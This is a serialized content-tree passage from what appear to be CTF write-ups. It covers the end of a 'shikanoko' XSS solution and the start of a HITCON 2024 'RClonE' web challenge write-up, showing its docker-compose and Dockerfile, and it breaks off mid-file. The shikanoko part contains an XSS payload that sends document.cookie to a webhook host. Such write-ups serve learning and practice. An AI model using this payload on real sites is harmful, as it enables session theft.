ag":128,"props":22097,"children":22098},{"style":312},[22099],{"type":38,"value":5625},{"type":33,"tag":128,"props":22101,"children":22102},{"style":312},[22103],{"type":38,"value":762},{"type":33,"tag":128,"props":22105,"children":22106},{"class":130,"line":976},[22107,22111,22115,22119,22123,22127,22131,22135,22139,22143,22147,22151,22155,22159,22163,22167,22171,22175],{"type":33,"tag":128,"props":22108,"children":22109},{"style":300},[22110],{"type":38,"value":19683},{"type":33,"tag":128,"props":22112,"children":22113},{"style":135},[22114],{"type":38,"value":19688},{"type":33,"tag":128,"props":22116,"children":22117},{"style":312},[22118],{"type":38,"value":5657},{"type":33,"tag":128,"props":22120,"children":22121},{"style":312},[22122],{"type":38,"value":2852},{"type":33,"tag":128,"props":22124,"children":22125},{"style":306},[22126],{"type":38,"value":19701},{"type":33,"tag":128,"props":22128,"children":22129},{"style":312},[22130],{"type":38,"value":2966},{"type":33,"tag":128,"props":22132,"children":22133},{"style":312},[22134],{"type":38,"value":5625},{"type":33,"tag":128,"props":22136,"children":22137},{"style":300},[22138],{"type":38,"value":13061},{"type":33,"tag":128,"props":22140,"children":22141},{"style":437},[22142],{"type":38,"value":13066},{"type":33,"tag":128,"props":22144,"children":22145},{"style":312},[22146],{"type":38,"value":5566},{"type":33,"tag":128,"props":22148,"children":22149},{"style":306},[22150],{"type":38,"value":13076},{"type":33,"tag":128,"props":22152,"children":22153},{"style":312},[22154],{"type":38,"value":5625},{"type":33,"tag":128,"props":22156,"children":22157},{"style":135},[22158],{"type":38,"value":19734},{"type":33,"tag":128,"props":22160,"children":22161},{"style":312},[22162],{"type":38,"value":5566},{"type":33,"tag":128,"props":22164,"children":22165},{"style":306},[22166],{"type":38,"value":13076},{"type":33,"tag":128,"props":22168,"children":22169},{"style":312},[22170],{"type":38,"value":5584},{"type":33,"tag":128,"props":22172,"children":22173},{"style":306},[22174],{"type":38,"value":19751},{"type":33,"tag":128,"props":22176,"children":22177},{"style":312},[22178],{"type":38,"value":9722},{"type":33,"tag":128,"props":22180,"children":22181},{"class":130,"line":988},[22182,22186,22190,22194,22198],{"type":33,"tag":128,"props":22183,"children":22184},{"style":1576},[22185],{"type":38,"value":19763},{"type":33,"tag":128,"props":22187,"children":22188},{"style":135},[22189],{"type":38,"value":19688},{"type":33,"tag":128,"props":22191,"children":22192},{"style":312},[22193],{"type":38,"value":5566},{"type":33,"tag":128,"props":22195,"children":22196},{"style":523},[22197],{"type":38,"value":78},{"type":33,"tag":128,"props":22199,"children":22200},{"style":312},[22201],{"type":38,"value":5815},{"type":33,"tag":128,"props":22203,"children":22204},{"class":130,"line":1001},[22205,22209,22213,22217,22221,22225,22230,22234],{"type":33,"tag":128,"props":22206,"children":22207},{"style":306},[22208],{"type":38,"value":21654},{"type":33,"tag":128,"props":22210,"children":22211},{"style":312},[22212],{"type":38,"value":215},{"type":33,"tag":128,"props":22214,"children":22215},{"style":306},[22216],{"type":38,"value":8275},{"type":33,"tag":128,"props":22218,"children":22219},{"style":312},[22220],{"type":38,"value":5657},{"type":33,"tag":128,"props":22222,"children":22223},{"style":676},[22224],{"type":38,"value":5710},{"type":33,"tag":128,"props":22226,"children":22227},{"style":140},[22228],{"type":38,"value":22229},"http://proxy/?html=\u003Cinput name=\"aaa\" value=\">{{VALUE}}hello\u003Cimg src=x onerror=window.location='https://webhook/?flag='+btoa(document.cookie)>\" data-value=\"DDDDD{{VALUE}}aaaaa id=asrc=x name=\"ooo\" type=\"image\">",{"type":33,"tag":128,"props":22231,"children":22232},{"style":676},[22233],{"type":38,"value":5739},{"type":33,"tag":128,"props":22235,"children":22236},{"style":312},[22237],{"type":38,"value":5676},{"type":33,"tag":128,"props":22239,"children":22240},{"class":130,"line":1014},[22241,22245,22249,22253,22257,22261,22265,22269,22273,22277],{"type":33,"tag":128,"props":22242,"children":22243},{"style":306},[22244],{"type":38,"value":19824},{"type":33,"tag":128,"props":22246,"children":22247},{"style":312},[22248],{"type":38,"value":5657},{"type":33,"tag":128,"props":22250,"children":22251},{"style":306},[22252],{"type":38,"value":7562},{"type":33,"tag":128,"props":22254,"children":22255},{"style":312},[22256],{"type":38,"value":215},{"type":33,"tag":128,"props":22258,"children":22259},{"style":135},[22260],{"type":38,"value":19841},{"type":33,"tag":128,"props":22262,"children":22263},{"style":312},[22264],{"type":38,"value":5566},{"type":33,"tag":128,"props":22266,"children":22267},{"style":676},[22268],{"type":38,"value":669},{"type":33,"tag":128,"props":22270,"children":22271},{"style":140},[22272],{"type":38,"value":5929},{"type":33,"tag":128,"props":22274,"children":22275},{"style":676},[22276],{"type":38,"value":669},{"type":33,"tag":128,"props":22278,"children":22279},{"style":312},[22280],{"type":38,"value":5815},{"type":33,"tag":128,"props":22282,"children":22283},{"class":130,"line":1026},[22284,22288,22292,22296,22300,22304,22308,22312],{"type":33,"tag":128,"props":22285,"children":22286},{"style":306},[22287],{"type":38,"value":19824},{"type":33,"tag":128,"props":22289,"children":22290},{"style":312},[22291],{"type":38,"value":215},{"type":33,"tag":128,"props":22293,"children":22294},{"style":306},[22295],{"type":38,"value":14160},{"type":33,"tag":128,"props":22297,"children":22298},{"style":312},[22299],{"type":38,"value":5657},{"type":33,"tag":128,"props":22301,"children":22302},{"style":676},[22303],{"type":38,"value":679},{"type":33,"tag":128,"props":22305,"children":22306},{"style":140},[22307],{"type":38,"value":19454},{"type":33,"tag":128,"props":22309,"children":22310},{"style":676},[22311],{"type":38,"value":669},{"type":33,"tag":128,"props":22313,"children":22314},{"style":312},[22315],{"type":38,"value":5676},{"type":33,"tag":128,"props":22317,"children":22318},{"class":130,"line":1038},[22319,22323,22327,22331,22335,22339,22343,22347,22351,22355],{"type":33,"tag":128,"props":22320,"children":22321},{"style":300},[22322],{"type":38,"value":19904},{"type":33,"tag":128,"props":22324,"children":22325},{"style":306},[22326],{"type":38,"value":17575},{"type":33,"tag":128,"props":22328,"children":22329},{"style":312},[22330],{"type":38,"value":5657},{"type":33,"tag":128,"props":22332,"children":22333},{"style":300},[22334],{"type":38,"value":13061},{"type":33,"tag":128,"props":22336,"children":22337},{"style":135},[22338],{"type":38,"value":19921},{"type":33,"tag":128,"props":22340,"children":22341},{"style":312},[22342],{"type":38,"value":5566},{"type":33,"tag":128,"props":22344,"children":22345},{"style":676},[22346],{"type":38,"value":6040},{"type":33,"tag":128,"props":22348,"children":22349},{"style":140},[22350],{"type":38,"value":17521},{"type":33,"tag":128,"props":22352,"children":22353},{"style":676},[22354],{"type":38,"value":6040},{"type":33,"tag":128,"props":22356,"children":22357},{"style":312},[22358],{"type":38,"value":5815},{"type":33,"tag":128,"props":22360,"children":22361},{"class":130,"line":1051},[22362,22366,22370,22374,22378,22382],{"type":33,"tag":128,"props":22363,"children":22364},{"style":306},[22365],{"type":38,"value":19824},{"type":33,"tag":128,"props":22367,"children":22368},{"style":312},[22369],{"type":38,"value":215},{"type":33,"tag":128,"props":22371,"children":22372},{"style":135},[22373],{"type":38,"value":19957},{"type":33,"tag":128,"props":22375,"children":22376},{"style":312},[22377],{"type":38,"value":5566},{"type":33,"tag":128,"props":22379,"children":22380},{"style":306},[22381],{"type":38,"value":17546},{"type":33,"tag":128,"props":22383,"children":22384},{"style":312},[22385],{"type":38,"value":5815},{"type":33,"tag":128,"props":22387,"children":22388},{"class":130,"line":1063},[22389],{"type":33,"tag":128,"props":22390,"children":22391},{"style":312},[22392],{"type":38,"value":19977},{"type":33,"tag":128,"props":22394,"children":22395},{"class":130,"line":1076},[22396,22400,22404],{"type":33,"tag":128,"props":22397,"children":22398},{"style":312},[22399],{"type":38,"value":6206},{"type":33,"tag":128,"props":22401,"children":22402},{"style":1576},[22403],{"type":38,"value":15064},{"type":33,"tag":128,"props":22405,"children":22406},{"style":312},[22407],{"type":38,"value":6097},{"type":33,"tag":128,"props":22409,"children":22410},{"class":130,"line":1089},[22411,22415,22419],{"type":33,"tag":128,"props":22412,"children":22413},{"style":312},[22414],{"type":38,"value":6190},{"type":33,"tag":128,"props":22416,"children":22417},{"style":1576},[22418],{"type":38,"value":5929},{"type":33,"tag":128,"props":22420,"children":22421},{"style":312},[22422],{"type":38,"value":6097},{"type":33,"tag":47,"props":22424,"children":22425},{},[22426],{"type":38,"value":22427},"And voilà, we have the flag:",{"type":33,"tag":75,"props":22429,"children":22431},{"imgSrc":22430},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731972549/writeups/shikanoko/response_from_bot_flag.webp",[],{"type":33,"tag":5227,"props":22433,"children":22434},{},[22435],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":22437},[22438,22439,22440,22441,22442,22443],{"id":42,"depth":362,"text":45},{"id":12032,"depth":362,"text":12035},{"id":14523,"depth":362,"text":14526},{"id":19313,"depth":362,"text":12046},{"id":20071,"depth":362,"text":20074},{"id":21053,"depth":362,"text":21056},"content:writeups:shikanoko.md","writeups/shikanoko.md","writeups/shikanoko",{"_path":22448,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":22449,"description":8,"head":22450,"body":22468,"_type":5240,"_id":25204,"_source":5242,"_file":25205,"_stem":25206,"_extension":5245},"/writeups/rclone","RClonE",{"title":22449,"description":22451,"keywords":22452,"slug":22453,"image":22454,"date":22455,"meta":22456},"RClonE was a web challenge from Hitcon qual 2024.","web,csrf,rce","rclone","https://res.cloudinary.com/dmju5zuhr/image/upload/v1721341554/writeups/hitcon_ctf.webp","2024-07-16",[22457,22458,22459,22460,22461,22463,22464,22466],{"og:image":22454},{"og:title":22449},{"og:description":22451},{"og:type":21},{"og:url":22462},"https://owalid.com/rclone",{"description":22451},{"title":22465},"RClonE writeup",{"keywords":22467},"web,csrf,rce,writeup,hitcon,ctf",{"type":30,"children":22469,"toc":25197},[22470,22474,22478,22482,22486,22490,22495,22879,22885,22890,22906,22911,23194,23199,23513,23873,23878,23883,23889,23903,23908,23912,23925,23930,23973,23978,23982,23987,24018,24026,24031,24036,24044,24048,24053,24057,24062,24067,24073,24087,24091,24103,24117,24121,24126,24131,24136,24141,24183,24188,24193,24378,24383,24597,24610,24819,24824,24828,24833,24837,24842,24846,24851,24929,24934,24968,24973,25174,25179,25184,25189,25193],{"type":33,"tag":34,"props":22471,"children":22472},{"id":22453},[22473],{"type":38,"value":22449},{"type":33,"tag":40,"props":22475,"children":22476},{"id":42},[22477],{"type":38,"value":45},{"type":33,"tag":47,"props":22479,"children":22480},{},[22481],{"type":38,"value":22451},{"type":33,"tag":47,"props":22483,"children":22484},{},[22485],{"type":38,"value":5300},{"type":33,"tag":75,"props":22487,"children":22489},{"imgSrc":22488},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721244495/writeups/rclone/archi.webp",[],{"type":33,"tag":47,"props":22491,"children":22492},{},[22493],{"type":38,"value":22494},"To begin with, we have two services that are launched from a docker-compose, one which is a bot that accesses the internet and one which is an Rclone service.",{"type":33,"tag":114,"props":22496,"children":22497},{"lang":11545},[22498],{"type":33,"tag":119,"props":22499,"children":22501},{"code":22500,"language":11545,"meta":8,"className":11549,"style":8},"services:\n rclone:\n image: rclone\n build: .\n environment:\n - SECRET=secret # randomized secret per instancer\n ports:\n - \"5572:5572\"\n networks:\n - chall\n bot:\n image: rclone-bot\n build: ./bot\n environment:\n - TITLE=Admin Bot for RClonE\n - PORT=8000\n - URL_CHECK_REGEX=^https?://.{1,256}$\n - SECRET=secret # randomized secret per instancer\n security_opt: \n - seccomp=chrome.json\n ports:\n - \"8000:8000\"\n networks:\n - default\n - chall\nnetworks:\n chall:\n internal: true\n",[22502],{"type":33,"tag":105,"props":22503,"children":22504},{"__ignoreMap":8},[22505,22516,22528,22544,22559,22570,22587,22598,22618,22629,22641,22652,22668,22684,22695,22707,22719,22731,22746,22762,22774,22785,22805,22816,22828,22839,22850,22862],{"type":33,"tag":128,"props":22506,"children":22507},{"class":130,"line":131},[22508,22512],{"type":33,"tag":128,"props":22509,"children":22510},{"style":437},[22511],{"type":38,"value":11593},{"type":33,"tag":128,"props":22513,"children":22514},{"style":312},[22515],{"type":38,"value":5318},{"type":33,"tag":128,"props":22517,"children":22518},{"class":130,"line":362},[22519,22524],{"type":33,"tag":128,"props":22520,"children":22521},{"style":437},[22522],{"type":38,"value":22523}," rclone",{"type":33,"tag":128,"props":22525,"children":22526},{"style":312},[22527],{"type":38,"value":5318},{"type":33,"tag":128,"props":22529,"children":22530},{"class":130,"line":403},[22531,22535,22539],{"type":33,"tag":128,"props":22532,"children":22533},{"style":437},[22534],{"type":38,"value":11617},{"type":33,"tag":128,"props":22536,"children":22537},{"style":312},[22538],{"type":38,"value":284},{"type":33,"tag":128,"props":22540,"children":22541},{"style":140},[22542],{"type":38,"value":22543}," rclone\n",{"type":33,"tag":128,"props":22545,"children":22546},{"class":130,"line":739},[22547,22551,22555],{"type":33,"tag":128,"props":22548,"children":22549},{"style":437},[22550],{"type":38,"value":11772},{"type":33,"tag":128,"props":22552,"children":22553},{"style":312},[22554],{"type":38,"value":284},{"type":33,"tag":128,"props":22556,"children":22557},{"style":523},[22558],{"type":38,"value":5220},{"type":33,"tag":128,"props":22560,"children":22561},{"class":130,"line":765},[22562,22566],{"type":33,"tag":128,"props":22563,"children":22564},{"style":437},[22565],{"type":38,"value":11803},{"type":33,"tag":128,"props":22567,"children":22568},{"style":312},[22569],{"type":38,"value":5318},{"type":33,"tag":128,"props":22571,"children":22572},{"class":130,"line":804},[22573,22577,22582],{"type":33,"tag":128,"props":22574,"children":22575},{"style":312},[22576],{"type":38,"value":11663},{"type":33,"tag":128,"props":22578,"children":22579},{"style":140},[22580],{"type":38,"value":22581}," SECRET=secret",{"type":33,"tag":128,"props":22583,"children":22584},{"style":5541},[22585],{"type":38,"value":22586}," # randomized secret per instancer\n",{"type":33,"tag":128,"props":22588,"children":22589},{"class":130,"line":839},[22590,22594],{"type":33,"tag":128,"props":22591,"children":22592},{"style":437},[22593],{"type":38,"value":11651},{"type":33,"tag":128,"props":22595,"children":22596},{"style":312},[22597],{"type":38,"value":5318},{"type":33,"tag":128,"props":22599,"children":22600},{"class":130,"line":848},[22601,22605,22609,22614],{"type":33,"tag":128,"props":22602,"children":22603},{"style":312},[22604],{"type":38,"value":11663},{"type":33,"tag":128,"props":22606,"children":22607},{"style":676},[22608],{"type":38,"value":679},{"type":33,"tag":128,"props":22610,"children":22611},{"style":140},[22612],{"type":38,"value":22613},"5572:5572",{"type":33,"tag":128,"props":22615,"children":22616},{"style":676},[22617],{"type":38,"value":836},{"type":33,"tag":128,"props":22619,"children":22620},{"class":130,"line":976},[22621,22625],{"type":33,"tag":128,"props":22622,"children":22623},{"style":437},[22624],{"type":38,"value":11712},{"type":33,"tag":128,"props":22626,"children":22627},{"style":312},[22628],{"type":38,"value":5318},{"type":33,"tag":128,"props":22630,"children":22631},{"class":130,"line":988},[22632,22636],{"type":33,"tag":128,"props":22633,"children":22634},{"style":312},[22635],{"type":38,"value":11663},{"type":33,"tag":128,"props":22637,"children":22638},{"style":140},[22639],{"type":38,"value":22640}," chall\n",{"type":33,"tag":128,"props":22642,"children":22643},{"class":130,"line":1001},[22644,22648],{"type":33,"tag":128,"props":22645,"children":22646},{"style":437},[22647],{"type":38,"value":11760},{"type":33,"tag":128,"props":22649,"children":22650},{"style":312},[22651],{"type":38,"value":5318},{"type":33,"tag":128,"props":22653,"children":22654},{"class":130,"line":1014},[22655,22659,22663],{"type":33,"tag":128,"props":22656,"children":22657},{"style":437},[22658],{"type":38,"value":11617},{"type":33,"tag":128,"props":22660,"children":22661},{"style":312},[22662],{"type":38,"value":284},{"type":33,"tag":128,"props":22664,"children":22665},{"style":140},[22666],{"type":38,"value":22667}," rclone-bot\n",{"type":33,"tag":128,"props":22669,"children":22670},{"class":130,"line":1026},[22671,22675,22679],{"type":33,"tag":128,"props":22672,"children":22673},{"style":437},[22674],{"type":38,"value":11772},{"type":33,"tag":128,"props":22676,"children":22677},{"style":312},[22678],{"type":38,"value":284},{"type":33,"tag":128,"props":22680,"children":22681},{"style":140},[22682],{"type":38,"value":22683}," ./bot\n",{"type":33,"tag":128,"props":22685,"children":22686},{"class":130,"line":1038},[22687,22691],{"type":33,"tag":128,"props":22688,"children":22689},{"style":437},[22690],{"type":38,"value":11803},{"type":33,"tag":128,"props":22692,"children":22693},{"style":312},[22694],{"type":38,"value":5318},{"type":33,"tag":128,"props":22696,"children":22697},{"class":130,"line":1051},[22698,22702],{"type":33,"tag":128,"props":22699,"children":22700},{"style":312},[22701],{"type":38,"value":11663},{"type":33,"tag":128,"props":22703,"children":22704},{"style":140},[22705],{"type":38,"value":22706}," TITLE=Admin Bot for RClonE\n",{"type":33,"tag":128,"props":22708,"children":22709},{"class":130,"line":1063},[22710,22714],{"type":33,"tag":128,"props":22711,"children":22712},{"style":312},[22713],{"type":38,"value":11663},{"type":33,"tag":128,"props":22715,"children":22716},{"style":140},[22717],{"type":38,"value":22718}," PORT=8000\n",{"type":33,"tag":128,"props":22720,"children":22721},{"class":130,"line":1076},[22722,22726],{"type":33,"tag":128,"props":22723,"children":22724},{"style":312},[22725],{"type":38,"value":11663},{"type":33,"tag":128,"props":22727,"children":22728},{"style":140},[22729],{"type":38,"value":22730}," URL_CHECK_REGEX=^https?://.{1,256}$\n",{"type":33,"tag":128,"props":22732,"children":22733},{"class":130,"line":1089},[22734,22738,22742],{"type":33,"tag":128,"props":22735,"children":22736},{"style":312},[22737],{"type":38,"value":11663},{"type":33,"tag":128,"props":22739,"children":22740},{"style":140},[22741],{"type":38,"value":22581},{"type":33,"tag":128,"props":22743,"children":22744},{"style":5541},[22745],{"type":38,"value":22586},{"type":33,"tag":128,"props":22747,"children":22748},{"class":130,"line":1101},[22749,22754,22758],{"type":33,"tag":128,"props":22750,"children":22751},{"style":437},[22752],{"type":38,"value":22753}," security_opt",{"type":33,"tag":128,"props":22755,"children":22756},{"style":312},[22757],{"type":38,"value":284},{"type":33,"tag":128,"props":22759,"children":22760},{"style":323},[22761],{"type":38,"value":2008},{"type":33,"tag":128,"props":22763,"children":22764},{"class":130,"line":1114},[22765,22769],{"type":33,"tag":128,"props":22766,"children":22767},{"style":312},[22768],{"type":38,"value":11663},{"type":33,"tag":128,"props":22770,"children":22771},{"style":140},[22772],{"type":38,"value":22773}," seccomp=chrome.json\n",{"type":33,"tag":128,"props":22775,"children":22776},{"class":130,"line":1127},[22777,22781],{"type":33,"tag":128,"props":22778,"children":22779},{"style":437},[22780],{"type":38,"value":11651},{"type":33,"tag":128,"props":22782,"children":22783},{"style":312},[22784],{"type":38,"value":5318},{"type":33,"tag":128,"props":22786,"children":22787},{"class":130,"line":1139},[22788,22792,22796,22801],{"type":33,"tag":128,"props":22789,"children":22790},{"style":312},[22791],{"type":38,"value":11663},{"type":33,"tag":128,"props":22793,"children":22794},{"style":676},[22795],{"type":38,"value":679},{"type":33,"tag":128,"props":22797,"children":22798},{"style":140},[22799],{"type":38,"value":22800},"8000:8000",{"type":33,"tag":128,"props":22802,"children":22803},{"style":676},[22804],{"type":38,"value":836},{"type":33,"tag":128,"props":22806,"children":22807},{"class":130,"line":1152},[22808,22812],{"type":33,"tag":128,"props":22809,"children":22810},{"style":437},[22811],{"type":38,"value":11712},{"type":33,"tag":128,"props":22813,"children":22814},{"style":312},[22815],{"type":38,"value":5318},{"type":33,"tag":128,"props":22817,"children":22818},{"class":130,"line":1165},[22819,22823],{"type":33,"tag":128,"props":22820,"children":22821},{"style":312},[22822],{"type":38,"value":11663},{"type":33,"tag":128,"props":22824,"children":22825},{"style":140},[22826],{"type":38,"value":22827}," default\n",{"type":33,"tag":128,"props":22829,"children":22830},{"class":130,"line":1177},[22831,22835],{"type":33,"tag":128,"props":22832,"children":22833},{"style":312},[22834],{"type":38,"value":11663},{"type":33,"tag":128,"props":22836,"children":22837},{"style":140},[22838],{"type":38,"value":22640},{"type":33,"tag":128,"props":22840,"children":22841},{"class":130,"line":1189},[22842,22846],{"type":33,"tag":128,"props":22843,"children":22844},{"style":437},[22845],{"type":38,"value":12003},{"type":33,"tag":128,"props":22847,"children":22848},{"style":312},[22849],{"type":38,"value":5318},{"type":33,"tag":128,"props":22851,"children":22852},{"class":130,"line":1202},[22853,22858],{"type":33,"tag":128,"props":22854,"children":22855},{"style":437},[22856],{"type":38,"value":22857}," chall",{"type":33,"tag":128,"props":22859,"children":22860},{"style":312},[22861],{"type":38,"value":5318},{"type":33,"tag":128,"props":22863,"children":22864},{"class":130,"line":1214},[22865,22870,22874],{"type":33,"tag":128,"props":22866,"children":22867},{"style":437},[22868],{"type":38,"value":22869}," internal",{"type":33,"tag":128,"props":22871,"children":22872},{"style":312},[22873],{"type":38,"value":284},{"type":33,"tag":128,"props":22875,"children":22876},{"style":1576},[22877],{"type":38,"value":22878}," true\n",{"type":33,"tag":40,"props":22880,"children":22882},{"id":22881},"recon",[22883],{"type":38,"value":22884},"Recon",{"type":33,"tag":47,"props":22886,"children":22887},{},[22888],{"type":38,"value":22889},"Before we start, we need to define what Rclone is.",{"type":33,"tag":22891,"props":22892,"children":22893},"blockquote",{},[22894],{"type":33,"tag":47,"props":22895,"children":22896},{},[22897,22899],{"type":38,"value":22898},"Rclone is an open source, multi threaded, command line computer program to manage or migrate content on cloud and other high latency storage. Its capabilities include sync, transfer, crypt, cache, union, compress and mount. The rclone website lists supported backends including S3 and Google Drive. ",{"type":33,"tag":53,"props":22900,"children":22903},{"href":22901,"rel":22902,":target":21222},"https://en.wikipedia.org/wiki/Rclone",[57],[22904],{"type":38,"value":22905},"Wikis",{"type":33,"tag":47,"props":22907,"children":22908},{},[22909],{"type":38,"value":22910},"Now that Rclone is set up, we can talk about the services launched by the challenge in detail. In the dockerfile of the Rclone service, you can see that it is launched with the web interface.",{"type":33,"tag":114,"props":22912,"children":22913},{"lang":9966},[22914],{"type":33,"tag":119,"props":22915,"children":22918},{"code":22916,"language":9966,"meta":8,"className":22917,"style":8},"FROM debian:bookworm-slim\n\nRUN apt-get update && \\\n apt-get install -y tini ca-certificates curl unzip && \\\n apt-get clean && \\\n rm -rf /var/lib/apt/lists/*\nWORKDIR /workdir\n\nARG RCLONE_VERSION=v1.67.0\nARG RCLONE_NAME=rclone-$RCLONE_VERSION-linux-amd64\nARG RCLONE_HASH=07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722\n\nRUN curl https://downloads.rclone.org/$RCLONE_VERSION/$RCLONE_NAME.zip -o rclone.zip && \\\n echo $RCLONE_HASH rclone.zip | sha256sum -c && \\\n unzip rclone.zip && \\\n mv $RCLONE_NAME/rclone /usr/bin\n\nCOPY ./readflag /readflag\nRUN chmod 111 /readflag\n\nRUN useradd -ms /bin/bash ctf\nUSER ctf\n\nENTRYPOINT [\"tini\", \"--\"]\nCMD rclone rcd --rc-addr 0.0.0.0:5572 --rc-web-gui --rc-user $SECRET --rc-pass $SECRET --rc-web-gui-no-open-browser\n","language-docker shiki shiki-themes vitesse-dark",[22919],{"type":33,"tag":105,"props":22920,"children":22921},{"__ignoreMap":8},[22922,22935,22942,22955,22963,22971,22979,22992,22999,23012,23024,23036,23043,23055,23063,23071,23079,23086,23099,23111,23118,23130,23143,23150,23181],{"type":33,"tag":128,"props":22923,"children":22924},{"class":130,"line":131},[22925,22930],{"type":33,"tag":128,"props":22926,"children":22927},{"style":1576},[22928],{"type":38,"value":22929},"FROM",{"type":33,"tag":128,"props":22931,"children":22932},{"style":323},[22933],{"type":38,"value":22934}," debian:bookworm-slim\n",{"type":33,"tag":128,"props":22936,"children":22937},{"class":130,"line":362},[22938],{"type":33,"tag":128,"props":22939,"children":22940},{"emptyLinePlaceholder":896},[22941],{"type":38,"value":899},{"type":33,"tag":128,"props":22943,"children":22944},{"class":130,"line":403},[22945,22950],{"type":33,"tag":128,"props":22946,"children":22947},{"style":1576},[22948],{"type":38,"value":22949},"RUN",{"type":33,"tag":128,"props":22951,"children":22952},{"style":323},[22953],{"type":38,"value":22954}," apt-get update && \\\n",{"type":33,"tag":128,"props":22956,"children":22957},{"class":130,"line":739},[22958],{"type":33,"tag":128,"props":22959,"children":22960},{"style":323},[22961],{"type":38,"value":22962}," apt-get install -y tini ca-certificates curl unzip && \\\n",{"type":33,"tag":128,"props":22964,"children":22965},{"class":130,"line":765},[22966],{"type":33,"tag":128,"props":22967,"children":22968},{"style":323},[22969],{"type":38,"value":22970}," apt-get clean && \\\n",{"type":33,"tag":128,"props":22972,"children":22973},{"class":130,"line":804},[22974],{"type":33,"tag":128,"props":22975,"children":22976},{"style":323},[22977],{"type":38,"value":22978}," rm -rf /var/lib/apt/lists/*\n",{"type":33,"tag":128,"props":22980,"children":22981},{"class":130,"line":839},[22982,22987],{"type":33,"tag":128,"props":22983,"children":22984},{"style":1576},[22985],{"type":38,"value":22986},"WORKDIR",{"type":33,"tag":128,"props":22988,"children":22989},{"style":323},[22990],{"type":38,"value":22991}," /workdir\n",{"type":33,"tag":128,"props":22993,"children":22994},{"class":130,"line":848},[22995],{"type":33,"tag":128,"props":22996,"children":22997},{"emptyLinePlaceholder":896},[22998],{"type":38,"value":899},{"type":33,"tag":128,"props":23000,"children":23001},{"class":130,"line":976},[23002,23007],{"type":33,"tag":128,"props":23003,"children":23004},{"style":1576},[23005],{"type":38,"value":23006},"ARG",{"type":33,"tag":128,"props":23008,"children":23009},{"style":323},[23010],{"type":38,"value":23011}," RCLONE_VERSION=v1.67.0\n",{"type":33,"tag":128,"props":23013,"children":23014},{"class":130,"line":988},[23015,23019],{"type":33,"tag":128,"props":23016,"children":23017},{"style":1576},[23018],{"type":38,"value":23006},{"type":33,"tag":128,"props":23020,"children":23021},{"style":323},[23022],{"type":38,"value":23023}," RCLONE_NAME=rclone-$RCLONE_VERSION-linux-amd64\n",{"type":33,"tag":128,"props":23025,"children":23026},{"class":130,"line":1001},[23027,23031],{"type":33,"tag":128,"props":23028,"children":23029},{"style":1576},[23030],{"type":38,"value":23006},{"type":33,"tag":128,"props":23032,"children":23033},{"style":323},[23034],{"type":38,"value":23035}," RCLONE_HASH=07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722\n",{"type":33,"tag":128,"props":23037,"children":23038},{"class":130,"line":1014},[23039],{"type":33,"tag":128,"props":23040,"children":23041},{"emptyLinePlaceholder":896},[23042],{"type":38,"value":899},{"type":33,"tag":128,"props":23044,"children":23045},{"class":130,"line":1026},[23046,23050],{"type":33,"tag":128,"props":23047,"children":23048},{"style":1576},[23049],{"type":38,"value":22949},{"type":33,"tag":128,"props":23051,"children":23052},{"style":323},[23053],{"type":38,"value":23054}," curl https://downloads.rclone.org/$RCLONE_VERSION/$RCLONE_NAME.zip -o rclone.zip && \\\n",{"type":33,"tag":128,"props":23056,"children":23057},{"class":130,"line":1038},[23058],{"type":33,"tag":128,"props":23059,"children":23060},{"style":323},[23061],{"type":38,"value":23062}," echo $RCLONE_HASH rclone.zip | sha256sum -c && \\\n",{"type":33,"tag":128,"props":23064,"children":23065},{"class":130,"line":1051},[23066],{"type":33,"tag":128,"props":23067,"children":23068},{"style":323},[23069],{"type":38,"value":23070}," unzip rclone.zip && \\\n",{"type":33,"tag":128,"props":23072,"children":23073},{"class":130,"line":1063},[23074],{"type":33,"tag":128,"props":23075,"children":23076},{"style":323},[23077],{"type":38,"value":23078}," mv $RCLONE_NAME/rclone /usr/bin\n",{"type":33,"tag":128,"props":23080,"children":23081},{"class":130,"line":1076},[23082],{"type":33,"tag":128,"props":23083,"children":23084},{"emptyLinePlaceholder":896},[23085],{"type":38,"value":899},{"type":33,"tag":128,"props":23087,"children":23088},{"class":130,"line":1089},[23089,23094],{"type":33,"tag":128,"props":23090,"children":23091},{"style":1576},[23092],{"type":38,"value":23093},"COPY",{"type":33,"tag":128,"props":23095,"children":23096},{"style":323},[23097],{"type":38,"value":23098}," ./readflag /readflag\n",{"type":33,"tag":128,"props":23100,"children":23101},{"class":130,"line":1101},[23102,23106],{"type":33,"tag":128,"props":23103,"children":23104},{"style":1576},[23105],{"type":38,"value":22949},{"type":33,"tag":128,"props":23107,"children":23108},{"style":323},[23109],{"type":38,"value":23110}," chmod 111 /readflag\n",{"type":33,"tag":128,"props":23112,"children":23113},{"class":130,"line":1114},[23114],{"type":33,"tag":128,"props":23115,"children":23116},{"emptyLinePlaceholder":896},[23117],{"type":38,"value":899},{"type":33,"tag":128,"props":23119,"children":23120},{"class":130,"line":1127},[23121,23125],{"type":33,"tag":128,"props":23122,"children":23123},{"style":1576},[23124],{"type":38,"value":22949},{"type":33,"tag":128,"props":23126,"children":23127},{"style":323},[23128],{"type":38,"value":23129}," useradd -ms /bin/bash ctf\n",{"type":33,"tag":128,"props":23131,"children":23132},{"class":130,"line":1139},[23133,23138],{"type":33,"tag":128,"props":23134,"children":23135},{"style":1576},[23136],{"type":38,"value":23137},"USER",{"type":33,"tag":128,"props":23139,"children":23140},{"style":323},[23141],{"type":38,"value":23142}," ctf\n",{"type":33,"tag":128,"props":23144,"children":23145},{"class":130,"line":1152},[23146],{"type":33,"tag":128,"props":23147,"children":23148},{"emptyLinePlaceholder":896},[23149],{"type":38,"value":899},{"type":33,"tag":128,"props":23151,"children":23152},{"class":130,"line":1165},[23153,23158,23162,23167,23172,23177],{"type":33,"tag":128,"props":23154,"children":23155},{"style":1576},[23156],{"type":38,"value":23157},"ENTRYPOINT",{"type":33,"tag":128,"props":23159,"children":23160},{"style":323},[23161],{"type":38,"value":718},{"type":33,"tag":128,"props":23163,"children":23164},{"style":140},[23165],{"type":38,"value":23166},"\"tini\"",{"type":33,"tag":128,"props":23168,"children":23169},{"style":323},[23170],{"type":38,"value":23171},", 